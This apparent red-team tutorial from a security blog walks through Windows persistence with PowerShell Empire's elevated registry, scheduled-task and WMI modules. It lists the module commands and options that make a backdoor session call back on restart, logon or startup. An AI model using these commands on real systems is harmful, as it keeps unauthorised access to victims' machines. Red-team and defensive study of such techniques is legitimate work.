Red Teaming

Windows Persistence with PowerShell Empire

This is the third article in our empire series, through this we will learn elevated persistence methods. Its trigger method is pretty organised with storage options contained within each module.

In Empire, the elevated persistence modules use trigger method and different storage options are required in different modules.  All of these persistence modules are based on PowerSploit’s persistence. As these are elevated persistence, it requires you to have admin access to work as intended. They have different setting options in them including cleanup, etc., for instance, the CleanUp option will set delete your backdoor and set the machine back to its original state.

The registry methods in gaining persistence are one of the oldest methods which use the HKLM version to trigger our payload into the system. Couple of persistence that we will show in our article will have schtasks as an option. This option makes the module a bit trickier as it sets the payload to be triggered on either DailyTime i.e. any given time or using OnLogon option which triggers the payload user is logged on. The Onlogon option does not display a prompt and runs as SYSTEM.

The WMI module is mostly the go-to persistence method. It lets you add a permanent WMI payload at either DailyTime (i.e. at a certain time) or at startup. This module to runs as SYSTEM and it doesn’t depend on the user being logged in.

The modules of persistence that we are going to show in our article are as follows :

  • Persistence/elevated/registry
  • Persistence/elevated/schtask
  • Persistence/elevated/wmi

Firstly, we have to have an elevated session (session with admin rights) through the empire. To know how to get the said session click here. As you can see in the image high integrity is set to 1 that means we have admin privileges. Now, we will use the first persistence module listed above and for this use the following commands :

usemodule persistence/elevated/registry*
set Listener http

Once the above module is executed and when the target machine is restarted, you will again automatically have your session. As shown in the image below :

Our next module is persistence/elevated/schtasks, this is a bit different from the previous one as in this we can set a certain time on which we want to gain our session. Again after having a session with administrator privileges, we will use the following set of commands to activate the said persistence module :

usemodule persistence/elevated/schtasks*
set OnLogon True
set Listener http

Due to OnLogon option, your session will return to you once the user logs on to their system, refer the following image for the same :

Lastly, we will use the persistence/elevated/wmi module and to use it, type the following set of commands :

usemodule persistence/elevated/wmi*
set Listener http
set AtStartup True

As we have set the startup option true, you will have your session as soon as the target machine starts up just like its shown in the image below :

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here